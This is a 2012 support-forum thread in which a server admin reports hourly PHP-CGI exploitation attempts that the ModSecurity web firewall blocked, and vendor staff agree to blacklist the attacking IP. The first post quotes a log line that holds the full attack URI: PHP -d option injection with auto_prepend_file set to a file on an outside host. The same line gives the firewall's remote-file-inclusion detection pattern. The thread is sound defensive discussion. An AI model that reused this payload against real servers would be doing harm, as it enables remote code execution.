store | blogs | forums | twitter | facebook | wiki | mailing lists | downloads | support portal
Atomic Secure Linux
It is currently Tue Jun 18, 2013 4:41 pm

» Feed - Atomicorp

All times are UTC - 5 hours [ DST ]




Post new topic Reply to topic Share/Bookmark  [ 6 posts ] 
Author Message
 Post subject: Hourly hacking attempt - PHP-CGI vulnerability
Unread postPosted: Thu Jun 14, 2012 3:05 pm 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 715
Location: Sweden
Hi,

I'm getting a few of these every hour. Easily caught by modsecurity, but maybe the IP, should be blacklisted in the honeybot?

The info.txt from http://81.17.24.83/info3.txt is just some numbers, probably something useful (PHP-CGI vulnerability)...

[modsecurity] [client 2.24.23.149] [domain domainname.se] [403] [/20120614/20120614-2044/20120614-204457-GJ-Ze38AAAEAABEP8EMAAAAP] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "493"] [id "340165"] [rev "277"] [msg "Atomicorp.com WAF Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/index.php?-dsafe_mode=off -ddisable_functions=null -dallow_url_fopen=on -dallow_url_include=on -dauto_prepend_file=http://81.17.24.83/info3.txt"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)://" at REQUEST_URI.


Top
 Profile  
 
 Post subject: Re: Hourly hacking attempt - PHP-CGI vulnerability
Unread postPosted: Thu Jun 14, 2012 5:15 pm 
Offline
Atomicorp Staff - Site Admin
Atomicorp Staff - Site Admin
User avatar

Joined: Thu Feb 07, 2008 7:49 pm
Posts: 3264
Location: Chantilly, VA
Added.

_________________
Michael Shinn
Atomicorp - Security For Everyone

Co-Author of Troubleshooting Linux Firewalls.


Top
 Profile  
 
 Post subject: Re: Hourly hacking attempt - PHP-CGI vulnerability
Unread postPosted: Fri Jun 15, 2012 7:17 am 
Offline
Forum Regular
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 715
Location: Sweden
Thanks!


Top
 Profile  
 
 Post subject: Re: Hourly hacking attempt - PHP-CGI vulnerability
Unread postPosted: Fri Jun 15, 2012 8:04 am 
Offline
Long Time Forum Regular
Long Time Forum Regular

Joined: Thu Dec 09, 2004 11:19 am
Posts: 1872
Right. I've had 1000s of these for weeks now.

This goes to show that I should have done something about it rather than just ignored them (they were, after all, being blocked).

Mike and Scott - you mentioned some form of collaborative data gathering system in a future version of ASL. Is this still on the cards? I'm imagining logs fragments being gathered and sent back to HQ every so often? I could then sit back and assume that someone would notice these oddities and do something about it, without me having to do anything at all except pay for a little bandwidth.

_________________
--------------------------------
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>


Top
 Profile  
 
 Post subject: Re: Hourly hacking attempt - PHP-CGI vulnerability
Unread postPosted: Fri Jun 15, 2012 11:30 am 
Offline
Atomicorp Staff - Site Admin
Atomicorp Staff - Site Admin
User avatar

Joined: Thu Feb 07, 2008 7:49 pm
Posts: 3264
Location: Chantilly, VA
Yep. Once we get finished with the new firewall system we're going to put some time towards this new feature.

_________________
Michael Shinn
Atomicorp - Security For Everyone

Co-Author of Troubleshooting Linux Firewalls.


Top
 Profile  
 
 Post subject: Re: Hourly hacking attempt - PHP-CGI vulnerability
Unread postPosted: Thu Dec 13, 2012 6:40 pm 
Offline
Atomicorp Staff - Site Admin
Atomicorp Staff - Site Admin
User avatar

Joined: Thu Feb 07, 2008 7:49 pm
Posts: 3264
Location: Chantilly, VA
Quote:
Mike and Scott - you mentioned some form of collaborative data gathering system in a future version of ASL. Is this still on the cards? I'm imagining logs fragments being gathered and sent back to HQ every so often? I could then sit back and assume that someone would notice these oddities and do something about it, without me having to do anything at all except pay for a little bandwidth.


We've started working on this now.

_________________
Michael Shinn
Atomicorp - Security For Everyone

Co-Author of Troubleshooting Linux Firewalls.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic Share/Bookmark  [ 6 posts ] 

» Feed - Atomicorp

All times are UTC - 5 hours [ DST ]


Who is online

Users browsing this forum: No registered users and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group